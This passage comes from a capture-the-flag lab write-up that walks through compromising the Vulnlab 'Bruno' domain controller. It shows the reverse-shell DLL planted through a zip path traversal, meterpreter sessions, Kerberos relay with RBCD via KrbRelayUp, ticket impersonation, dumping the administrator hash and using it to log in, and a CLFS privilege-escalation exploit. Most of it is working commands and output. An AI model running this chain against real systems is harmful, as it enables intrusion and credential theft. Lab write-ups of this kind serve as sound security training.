simple c++ reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll and created the zip file with a path traversal

Then compress it to a zip file hostfxr.zip:

image

Then edit the Zip file with 7-Zip and rename the file to include a path traversal:

image

Now we can upload it to the target to the queue SMB share:

$ smbclientng -u 'svc_scan' -p 'Sunshine1' --host brunodc.bruno.vl                               
               _          _ _            _                    
 ___ _ __ ___ | |__   ___| (_) ___ _ __ | |_      _ __   __ _ 
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | |  __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__|    |_| |_|\__, |
    by @podalirius_                             v2.1.7  |___/  
    
[+] Successfully authenticated to 'brunodc.bruno.vl' as '.\svc_scan'!
■[\\brunodc.bruno.vl\]> use queue
■[\\brunodc.bruno.vl\queue\]> put hostfxr.zip
hostfxr.zip
'hostfxr.zip' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.9/1.9 kB • ? • 0:00:00
■[\\brunodc.bruno.vl\queue\]> ls
d-------     0.00 B  2025-01-28 11:09  .\
d-------     0.00 B  2022-06-29 22:41  ..\
-a------    1.89 kB  2025-01-28 16:37  hostfxr.zip
■[\\brunodc.bruno.vl\queue\]> exit

After few times, we can see that our file has been correctly analyzed by the SampleScanner and found our malicious dll under the /app FTP folder:

$ ftp -i anonymous@brunodc.bruno.vl                       
Connected to brunodc.bruno.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||57649|)
150 Opening ASCII mode data connection.
01-28-25  07:37AM       <DIR>          app
06-29-22  04:33PM       <DIR>          benign
06-29-22  01:41PM       <DIR>          malicious
01-28-25  07:37AM       <DIR>          queue
226 Transfer complete.
ftp> cd app
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||57660|)
150 Opening ASCII mode data connection.
06-29-22  05:42PM                  165 changelog
01-28-25  04:16PM                 9216 hostfxr.dll
06-28-22  07:15PM                  431 SampleScanner.deps.json
06-29-22  03:58PM                 7168 SampleScanner.dll
06-29-22  03:58PM               174592 SampleScanner.exe
06-28-22  07:15PM                  170 SampleScanner.runtimeconfig.dev.json
06-28-22  07:15PM                  154 SampleScanner.runtimeconfig.json
226 Transfer complete.
ftp> quit
221 Goodbye.

We got our reverse shell then we upgrade it to have a full meterpreter shell as svc_scan:

msf6 exploit(multi/handler) > [*] Command shell session 1 opened (10.8.4.253:443 -> 10.10.106.103:57541) at 2025-01-28 16:38:59 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                     Connection
  --  ----  ----               -----------                                                     ----------
  1         shell x64/windows  Shell Banner: Microsoft Windows [Version 10.0.20348.768] -----  10.8.4.253:443 -> 10.10.106.103:57541 (10.10.106.103)

msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.4.253:4433 
msf6 exploit(multi/handler) > 
[*] Sending stage (203846 bytes) to 10.10.106.103
[*] Meterpreter session 2 opened (10.8.4.253:4433 -> 10.10.106.103:57695) at 2025-01-28 16:44:52 +0900
[*] Stopping exploit/multi/handler

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                                                     Connection
  --  ----  ----                     -----------                                                     ----------
  1         shell x64/windows        Shell Banner: Microsoft Windows [Version 10.0.20348.768] -----  10.8.4.253:443 -> 10.10.106.103:57541 (10.10.106.103)
  2         meterpreter x64/windows  BRUNO\svc_scan @ BRUNODC                                        10.8.4.253:4433 -> 10.10.106.103:57695 (10.10.106.103)

We grab the flag Bruno_User:

meterpreter > pwd
C:\Windows\system32
meterpreter > cd c:\\
meterpreter > pwd
c:\
meterpreter > dir
Listing: c:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2022-06-29 22:05:39 +0900  $Recycle.Bin
040777/rwxrwxrwx  0       dir   2022-06-15 14:51:59 +0900  $WinREAgent
100666/rw-rw-rw-  1       fil   2021-05-08 17:14:33 +0900  BOOTNXT
040777/rwxrwxrwx  8192    dir   2022-06-15 15:01:36 +0900  Boot
040777/rwxrwxrwx  0       dir   2021-08-19 08:34:55 +0900  Documents and Settings
000000/---------  0       fif   1970-01-01 09:00:00 +0900  DumpStack.log.tmp
040777/rwxrwxrwx  0       dir   2021-08-19 15:24:49 +0900  EFI
040777/rwxrwxrwx  0       dir   2021-05-08 17:20:24 +0900  PerfLogs
040555/r-xr-xr-x  4096    dir   2022-06-30 01:15:21 +0900  Program Files
040777/rwxrwxrwx  4096    dir   2022-06-29 22:28:58 +0900  Program Files (x86)
040777/rwxrwxrwx  4096    dir   2025-01-28 09:59:28 +0900  ProgramData
040777/rwxrwxrwx  0       dir   2022-06-29 20:36:29 +0900  Recovery
040777/rwxrwxrwx  4096    dir   2022-06-29 22:23:34 +0900  System Volume Information
040555/r-xr-xr-x  4096    dir   2022-06-30 01:09:14 +0900  Users
040777/rwxrwxrwx  16384   dir   2022-06-29 22:32:51 +0900  Windows
100444/r--r--r--  437498  fil   2022-06-15 14:56:49 +0900  bootmgr
040777/rwxrwxrwx  4096    dir   2022-06-29 23:43:53 +0900  inetpub
000000/---------  0       fif   1970-01-01 09:00:00 +0900  pagefile.sys
040777/rwxrwxrwx  0       dir   2022-06-29 22:41:03 +0900  samples
100666/rw-rw-rw-  37      fil   2022-06-30 00:00:22 +0900  user.txt

meterpreter > cat c:\\user.txt
VL{6efd85f20df80e14a0452381657809e4}

Privilege Escalation

Check the privileges of svc_scan:

meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeMachineAccountPrivilege

We have only SeMachineAccountPrivilege that can be interesting

To be able to abuse this privilege, we need first to check the value of MachineAccountQuota to see if we have the capacity to create a new machine:

$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq                                  
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.106.103   389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
MAQ         10.10.106.103   389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         10.10.106.103   389    BRUNODC          MachineAccountQuota: 10

Confirmed we can do it

We are thinking to proceed to a Kerberos relay attack, but we need to check if the LDAP does not have signing enabled:

$ nxc ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB         10.10.106.103   445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        10.10.106.103   389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP-CHE... 10.10.106.103   389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.106.103   389    BRUNODC          LDAPS Channel Binding is set to "NEVER"

Good, LDAP Signing is NOT enforced

Check if Defender or MDE is present and enabled:

meterpreter > shell
Process 4848 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.

c:\>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\> Get-MpComputerStatus
Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.2203.5
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  : 
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
AntivirusSignatureLastUpdated    : 
AntivirusSignatureVersion        : 0.0.0.0
BehaviorMonitorEnabled           : False
ComputerID                       : B552A93F-D382-4543-A7C7-AA0CEC3B91E1
ComputerState                    : 0
DefenderSignaturesOutOfDate      : False
DeviceControlDefaultEnforcement  : N/A
DeviceControlPoliciesLastUpdated : 1/1/1601 12:00:00 AM
DeviceControlState               : N/A
FullScanAge                      : 4294967295
FullScanEndTime                  : 
FullScanOverdue                  : False
FullScanRequired                 : False
FullScanSignatureVersion         : 
FullScanStartTime                : 
IoavProtectionEnabled            : False
IsTamperProtected                : False
IsVirtualMachine                 : True
LastFullScanSource               : 0
LastQuickScanSource              : 0
NISEnabled                       : False
NISEngineVersion                 : 0.0.0.0
NISSignatureAge                  : 4294967295
NISSignatureLastUpdated          : 
NISSignatureVersion              : 0.0.0.0
OnAccessProtectionEnabled        : False
ProductStatus                    : 1
QuickScanAge                     : 4294967295
QuickScanEndTime                 : 
QuickScanOverdue                 : False
QuickScanSignatureVersion        : 
QuickScanStartTime               : 
RealTimeProtectionEnabled        : False
RealTimeScanDirection            : 0
RebootRequired                   : False
TamperProtectionSource           : Signatures
TDTMode                          : N/A
TDTStatus                        : N/A
TDTTelemetry                     : N/A
PSComputerName                   : 

Lucky as RealTimeProtectionEnabled: False

KrbRelay with RBCD Privilege Escalation (Bruno_Root)

A Kerberos relay attack is essentially an authentication attack much like NTLM relay that allows us to relay a domain objects Kerberos authentication to another service. This essentially allows us to relay an ASREQ to any SPN that we need to authenticate to. Where LDAP signing essentially plays a picture into this is that it will encrypt all traffic over LDAP, meaning we won’t be able to properly sniff the traffic for authentication tokens as a MITM. If you want to delve into more information about Kerberos Relaying and how it works, this was the blog post I used mainly as research into the topic.

In our case, we should be able to create a fake domain computer object and coerce an authentication attempt using RBCD. The only issue is, how do we do coerce authentication if we’re using Kerberos authentication? This is where the idea of abusing CLSIDs comes into play, as CLSIDs are essentially identifiers for application components in Windows. These are predefined by the Windows operating system, meaning we can use a curated list here or here. We’re specifically looking for one that works with Windows Server 2019/2022, as that is the current operating system that we’re on.

In particular, the CLSID I picked was d99e6e73-fc88-11d0-b498-00a0c90312f3.

So let’s do it.

  1. Download KrbRelayUp and compile it using Visual Studio:
$ git clone https://github.com/Dec0ne/KrbRelayUp.git
  1. Upload it to our target:
meterpreter > pwd
c:\windows\tasks
meterpreter > upload KrbRelayUp.exe
[*] Uploading  : /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
[*] Uploaded 401.50 KiB of 401.50 KiB (100.0%): /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
[*] Completed  : /home/user/Downloads/VULNLAB/BRUNO/KrbRelayUp.exe -> KrbRelayUp.exe
  1. Execute it on the target machine using the CLSID that we have selected:
PS C:\windows\tasks> .\KrbRelayUp.exe relay -Domain bruno.vl -CreateNewComputerAccount -ComputerName pwn$ -ComputerPassword Azerty123! --clsid d99e6e73-fc88-11d0-b498-00a0c90312f3
KrbRelayUp - Relaying you to SYSTEM

[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Computer account "pwn$" added with password "Azerty123!"
[+] Looking for available ports..
[+] Port 10246 available
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
    ./KrbRelayUp.exe spawn -m rbcd -d bruno.vl -dc brunodc.bruno.vl -cn pwn$ -cp Azerty123!
  1. Get a TGS on behalf of the Administrator account to CIFS using our fake machine account.:
$ impacket-getST -spn cifs/brunodc.bruno.vl -impersonate Administrator -dc-ip brunodc.bruno.vl  bruno.vl/'pwn$':'Azerty123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
  1. Inject the ticket to our global environement variable:
$ export KRB5CCNAME=Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache 
$ klist
Ticket cache: FILE:Administrator@cifs_brunodc.bruno.vl@BRUNO.VL.ccache
Default principal: Administrator@bruno.vl

Valid starting       Expires              Service principal
01/28/2025 17:30:18  01/29/2025 03:30:17  cifs/brunodc.bruno.vl@BRUNO.VL
	renew until 01/29/2025 17:30:17

We double check to be sure we can use it:

$ nxc smb brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl                                                    
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\Administrator from ccache (Pwn3d!)

Confirmed

Then we can grab the flag Bruno_Root:

$ nxc winrm brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl -X 'type c:\users\administrator\desktop\root.txt' 
WINRM       brunodc.bruno.vl 5985   BRUNODC          [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
WINRM       brunodc.bruno.vl 5985   BRUNODC          [-] Execute command failed, error: 'NoneType' object has no attribute 'execute_ps'

Hummm for an unknown reason that failed.

Anyway, we use it to grab the Administrator’s hash:

$ nxc smb brunodc.bruno.vl --use-kcache --kdcHost brunodc.bruno.vl --ntds --user Administrator 
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\Administrator from ccache (Pwn3d!)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         brunodc.bruno.vl 445    BRUNODC          Administrator:500:aad3b435b51404eeaad3b435b51404ee:13735c7d60b417421dc6130ac3e0bfd4:::
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Dumped 1 NTDS hashes to /home/user/.nxc/logs/BRUNODC_brunodc.bruno.vl_2025-01-28_182209.ntds of which 1 were added to the database

And finally grab the vlag:

$ nxc winrm brunodc.bruno.vl -u Administrator -H '13735c7d60b417421dc6130ac3e0bfd4' -X 'type c:\users\administrator\desktop\root.txt'
WINRM       10.10.106.103   5985   BRUNODC          [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
WINRM       10.10.106.103   5985   BRUNODC          [+] bruno.vl\Administrator:13735c7d60b417421dc6130ac3e0bfd4 (Pwn3d!)
WINRM       10.10.106.103   5985   BRUNODC          [+] Executed command (shell type: powershell)
WINRM       10.10.106.103   5985   BRUNODC          VL{b528ba689d85ca396374c0f186087a7d}

Extra

Unintended way - CVE-2023-28252 (Bruno_Root)

The targeted Windows Server is vulnerable to the CVE-2023-28252.

This Windows zero-day vulnerability targets the Common Log File System (CLFS) and allows attackers to escalate privileges and potentially fully compromise an organization’s Windows systems.

More information:

From our Meterpreter session as svc_scan, we can escalate our local privileges to become Administrator using the embedded exploit below:

msf6 exploit(windows/local/cve_2023_28252_clfs_driver) > exploit 

[*] Started reverse TCP handler on X:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
[*] Launching netsh to host the DLL...
[+] Process 2556 launched.
[*] Reflectively injecting the DLL into 2556...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.106.103
[*] Meterpreter session 2 opened (X:4444 -> 10.10.106.103:51517) at 2025-01-28 18:49:10 +0900

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=3629f667-eed8-4560-803e-b0fb40e8ace8

BRUNO